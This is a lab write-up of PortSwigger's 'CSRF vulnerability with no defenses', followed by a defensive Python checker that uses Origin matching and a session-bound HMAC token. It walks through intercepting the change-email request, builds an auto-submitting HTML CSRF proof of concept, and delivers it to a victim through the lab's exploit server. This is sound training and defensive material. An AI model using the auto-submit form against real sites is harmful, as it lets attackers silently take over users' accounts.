Labs Covered
This write-up focuses on the following labs from the PortSwigger Web Security Academy related to Cross-Site Request Forgery (CSRF):
1. CSRF vulnerability with no defenses
This lab demonstrates how attackers can exploit CSRF vulnerabilities in applications that lack any protection against such attacks.
LAB 1 - CSRF vulnerability with no defenses
Solution
Overview
This lab demonstrates a basic Cross-Site Request Forgery (CSRF) attack where the email change functionality is not protected by any anti-CSRF mechanisms.
Step-by-Step Walkthrough
1. Logging In
- I logged into the application using the provided credentials:
  - Username: wiener
  - Password: peter
2. Navigating to the Vulnerable Functionality
- After login, I navigated to the My Account page.
- I observed an "Update email address" form where users can change their registered email.
3. Analyzing the Request in Burp Suite
- I intercepted the email change request in Burp Suite.
- The POST request looked like this:

```http
POST /my-account/change-email HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Cookie: session=your_session_cookie

email=admin@abc.com
```

Key Observations:
- No anti-CSRF tokens were present.
- No custom headers such as X-CSRF-Token.
- Only a single parameter: email.

This confirmed that the application lacked CSRF protection.
4. Generating the CSRF Proof of Concept (PoC)
- In Burp, I right-clicked the request and selected: Engagement tools > Generate CSRF PoC
- I enabled the Auto-submit script from the Options tab.
- Final CSRF HTML PoC:

```html
<html>
  <body>
    <form action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="email-attacker@example.com" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```

Replace YOUR-LAB-ID with your actual lab domain.
5. Delivering the Exploit
- I hosted the PoC on the exploit server provided in the lab.
- I clicked "Deliver exploit to victim".
- When the victim (a logged-in user) visited the page, their email was silently changed to email-attacker@example.com.
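As an added defender's-side illustration (not part of the lab or of this write-up), the following Python check shows what the change-email handler was missing and why the auto-submit PoC above would have failed against it: an exact Origin match plus a CSRF token bound to the session cookie. The server secret, the exploit-server origin and the sample requests are constructed placeholders, and the HMAC-derived synchronizer token is a standard pattern, not anything taken from the lab.

```python
import hmac
import hashlib
from urllib.parse import parse_qs, urlsplit

# Constructed demo values; the secret and origin are placeholders, not data from the lab.
SERVER_SECRET = b"constructed-demo-secret"
SITE_ORIGIN = "https://YOUR-LAB-ID.web-security-academy.net"

def csrf_token_for(session_id: str) -> str:
    """Synchronizer token bound to the session via HMAC; unguessable without SERVER_SECRET."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def parse_request(raw: str):
    """Tiny parser for raw HTTP/1.1 request text: (method, path, lower-cased headers, body)."""
    head, _, body = raw.strip("\n").partition("\n\n")
    request_line, *header_lines = head.splitlines()
    method, path, _version = request_line.split(" ", 2)
    headers = {k.strip().lower(): v.strip() for k, _, v in (h.partition(":") for h in header_lines)}
    return method, path, headers, body.strip()

def check_change_email(raw: str):
    """Return (accepted, reason). Adds the two checks the lab's handler lacks: an exact
    Origin match and a CSRF token bound to the session cookie."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path != "/my-account/change-email":
        return False, "wrong endpoint"
    cookies = dict(c.strip().split("=", 1) for c in headers.get("cookie", "").split(";") if "=" in c)
    session = cookies.get("session")
    if not session:
        return False, "no session cookie"
    parts = urlsplit(headers.get("origin", ""))
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:  # exact match, never startswith()
        return False, "cross-origin request"
    token = parse_qs(body).get("csrf", [""])[0]
    if not hmac.compare_digest(token, csrf_token_for(session)):  # constant-time compare
        return False, "missing or invalid csrf token"
    return True, "ok"

# Constructed samples. FORGED is what the auto-submit PoC produces: the browser attaches the
# victim's cookie and the exploit server's Origin, but no token. LEGIT is the site's own form.
FORGED = """POST /my-account/change-email HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Origin: https://exploit-server.example
Content-Type: application/x-www-form-urlencoded
Cookie: session=your_session_cookie

email=email-attacker@example.com"""
LEGIT = FORGED.replace("https://exploit-server.example", SITE_ORIGIN).replace(
    "email=email-attacker@example.com",
    "email=wiener@normal-user.net&csrf=" + csrf_token_for("your_session_cookie"))
```

Either check alone stops this lab's PoC; keeping both means a Referer/Origin parsing slip does not become a full bypass.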